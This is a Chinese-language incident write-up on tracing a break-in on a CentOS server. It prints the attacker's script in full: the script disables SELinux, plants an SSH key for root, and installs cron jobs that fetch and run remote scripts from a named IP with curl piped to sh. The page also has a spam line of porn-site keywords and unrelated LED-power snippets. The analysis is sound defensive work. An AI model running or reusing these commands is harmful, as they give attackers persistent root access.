www.久久久久|狼友网站av天堂|精品国产无码a片|一级av色欲av|91在线播放视频|亚洲无码主播在线|国产精品草久在线|明星AV网站在线|污污内射久久一区|婷婷综合视频网站

當前位置:首頁 > 單片機 > 架構(gòu)師社區(qū)

記一次?Linux?被入侵全過程

時間:2021-12-08 17:11:42
關(guān)鍵字: Linux    EV    腳本    ROOT   
手機看文章

掃描二維碼
隨時隨地手機看文章

[導讀]0x00背景周一早上剛到辦公室,就聽到同事說有一臺服務(wù)器登陸不上了,我也沒放在心上,繼續(xù)邊吃早點,邊看幣價是不是又跌了。不一會運維的同事也到了,氣喘吁吁的說:我們有臺服務(wù)器被阿里云凍結(jié)了,理由:對外惡意發(fā)包。我放下酸菜餡的包子,ssh連了一下,被拒絕了,問了下默認的22端口被封了...


0x00 背景

周一早上剛到辦公室,就聽到同事說有一臺服務(wù)器登陸不上了,我也沒放在心上,繼續(xù)邊吃早點,邊看幣價是不是又跌了。不一會運維的同事也到了,氣喘吁吁的說:我們有臺服務(wù)器被阿里云凍結(jié)了,理由:對外惡意發(fā)包。我放下酸菜餡的包子,ssh連了一下,被拒絕了,問了下默認的22端口被封了。讓運維的同事把端口改了一下,立馬連上去,順便看了一下登錄名:root,還有不足8位的小白密碼,心里一涼:被黑了!

0x01 查找線索

服務(wù)器系統(tǒng)CentOS 6.X,部署了nginx,tomcat,redis等應(yīng)用,上來先把數(shù)據(jù)庫全備份到本地,然后top命令看了一下,有2個99%的同名進程還在運行,叫g(shù)pg-agentd。

google了一下gpg,結(jié)果是:

GPG提供的gpg-agent提供了對SSH協(xié)議的支持,這個功能可以大大簡化密鑰的管理工作。
看起來像是一個很正經(jīng)的程序嘛,但仔細再看看服務(wù)器上的進程后面還跟著一個字母d,偽裝的很好,讓人想起來windows上各種看起來像svchost.exe的病毒。繼續(xù)

ps eho command -p 23374netstat -pan | grep 23374查看pid:23374進程啟動路徑和網(wǎng)絡(luò)狀況,也就是來到了圖1的目錄,到此已經(jīng)找到了黑客留下的二進制可執(zhí)行文件。接下來還有2個問題在等著我:

1、文件是怎么上傳的?
2、這個文件的目的是什么,或是黑客想干嘛?
history看一下,記錄果然都被清掉了,沒留下任何痕跡。繼續(xù)命令more messages,

看到了在半夜12點左右,在服務(wù)器上裝了很多軟件,其中有幾個軟件引起了我的注意,下面詳細講。邊找邊猜,如果我們要做壞事,大概會在哪里做文章,自動啟動?定時啟動?對,計劃任務(wù)。

crontab -e
果然,線索找到了。

0x02 作案動機

上面的計劃任務(wù)的意思就是每15分鐘去服務(wù)器上下載一個腳本,并且執(zhí)行這個腳本。我們把腳本下載下來看一下。

curl -fsSL 159.89.190.243/ash.php > ash.sh腳本內(nèi)容如下:

uname -aidhostnamesetenforce 0 2>/dev/nullulimit -n 50000ulimit -u 50000crontab -r 2>/dev/nullrm -rf /var/spool/cron/* 2>/dev/nullmkdir -p /var/spool/cron/crontabs 2>/dev/nullmkdir -p /root/.ssh 2>/dev/nullecho 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0 xigBIrdgo2p5nBtrpYZ2/GN3 ThY PNUqx redisX' > /root/.ssh/authorized_keysecho '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/rootecho '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/crontabs/rootyum install -y bash 2>/dev/nullapt install -y bash 2>/dev/nullapt-get install -y bash 2>/dev/nullbash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2>/dev/null大致分析一下該腳本的主要用途:

首先是關(guān)閉SELinux,解除shell資源訪問限制,然后在/root/.ssh/authorized_keys文件中生成ssh公鑰,這樣每次黑客登錄這臺服務(wù)器就可以免密碼登錄了,執(zhí)行腳本就會方便很多,關(guān)于ssh keys的文章可以參考這一篇文章SSH原理與運用。接下來安裝bash,最后是繼續(xù)下載第二個腳本bsh.php,并且執(zhí)行。
繼續(xù)下載并分析bsh.pbp,內(nèi)容如下:

sleep $( seq 3 7 | sort -R | head -n1 )cd /tmp || cd /var/tmpsleep 1mkdir -p .ICE-unix/...
本站聲明: 本文章由作者或相關(guān)機構(gòu)授權(quán)發(fā)布,目的在于傳遞更多信息,并不代表本站贊同其觀點,本站亦不保證或承諾內(nèi)容真實性等。需要轉(zhuǎn)載請聯(lián)系該專欄作者,如若文章內(nèi)容侵犯您的權(quán)益,請及時聯(lián)系本站刪除。
換一批
延伸閱讀

LED驅(qū)動電源的輸入包括高壓工頻交流(即市電)、低壓直流、高壓直流、低壓高頻交流(如電子變壓器的輸出)等。

關(guān)鍵字: 驅(qū)動電源

在工業(yè)自動化蓬勃發(fā)展的當下,工業(yè)電機作為核心動力設(shè)備,其驅(qū)動電源的性能直接關(guān)系到整個系統(tǒng)的穩(wěn)定性和可靠性。其中,反電動勢抑制與過流保護是驅(qū)動電源設(shè)計中至關(guān)重要的兩個環(huán)節(jié),集成化方案的設(shè)計成為提升電機驅(qū)動性能的關(guān)鍵。

關(guān)鍵字: 工業(yè)電機 驅(qū)動電源

LED 驅(qū)動電源作為 LED 照明系統(tǒng)的 “心臟”,其穩(wěn)定性直接決定了整個照明設(shè)備的使用壽命。然而,在實際應(yīng)用中,LED 驅(qū)動電源易損壞的問題卻十分常見,不僅增加了維護成本,還影響了用戶體驗。要解決這一問題,需從設(shè)計、生...

關(guān)鍵字: 驅(qū)動電源 照明系統(tǒng) 散熱

根據(jù)LED驅(qū)動電源的公式,電感內(nèi)電流波動大小和電感值成反比,輸出紋波和輸出電容值成反比。所以加大電感值和輸出電容值可以減小紋波。

關(guān)鍵字: LED 設(shè)計 驅(qū)動電源

電動汽車(EV)作為新能源汽車的重要代表,正逐漸成為全球汽車產(chǎn)業(yè)的重要發(fā)展方向。電動汽車的核心技術(shù)之一是電機驅(qū)動控制系統(tǒng),而絕緣柵雙極型晶體管(IGBT)作為電機驅(qū)動系統(tǒng)中的關(guān)鍵元件,其性能直接影響到電動汽車的動力性能和...

關(guān)鍵字: 電動汽車 新能源 驅(qū)動電源

在現(xiàn)代城市建設(shè)中,街道及停車場照明作為基礎(chǔ)設(shè)施的重要組成部分,其質(zhì)量和效率直接關(guān)系到城市的公共安全、居民生活質(zhì)量和能源利用效率。隨著科技的進步,高亮度白光發(fā)光二極管(LED)因其獨特的優(yōu)勢逐漸取代傳統(tǒng)光源,成為大功率區(qū)域...

關(guān)鍵字: 發(fā)光二極管 驅(qū)動電源 LED

LED通用照明設(shè)計工程師會遇到許多挑戰(zhàn),如功率密度、功率因數(shù)校正(PFC)、空間受限和可靠性等。

關(guān)鍵字: LED 驅(qū)動電源 功率因數(shù)校正

在LED照明技術(shù)日益普及的今天,LED驅(qū)動電源的電磁干擾(EMI)問題成為了一個不可忽視的挑戰(zhàn)。電磁干擾不僅會影響LED燈具的正常工作,還可能對周圍電子設(shè)備造成不利影響,甚至引發(fā)系統(tǒng)故障。因此,采取有效的硬件措施來解決L...

關(guān)鍵字: LED照明技術(shù) 電磁干擾 驅(qū)動電源

開關(guān)電源具有效率高的特性,而且開關(guān)電源的變壓器體積比串聯(lián)穩(wěn)壓型電源的要小得多,電源電路比較整潔,整機重量也有所下降,所以,現(xiàn)在的LED驅(qū)動電源

關(guān)鍵字: LED 驅(qū)動電源 開關(guān)電源

LED驅(qū)動電源是把電源供應(yīng)轉(zhuǎn)換為特定的電壓電流以驅(qū)動LED發(fā)光的電壓轉(zhuǎn)換器,通常情況下:LED驅(qū)動電源的輸入包括高壓工頻交流(即市電)、低壓直流、高壓直流、低壓高頻交流(如電子變壓器的輸出)等。

關(guān)鍵字: LED 隧道燈 驅(qū)動電源
關(guān)閉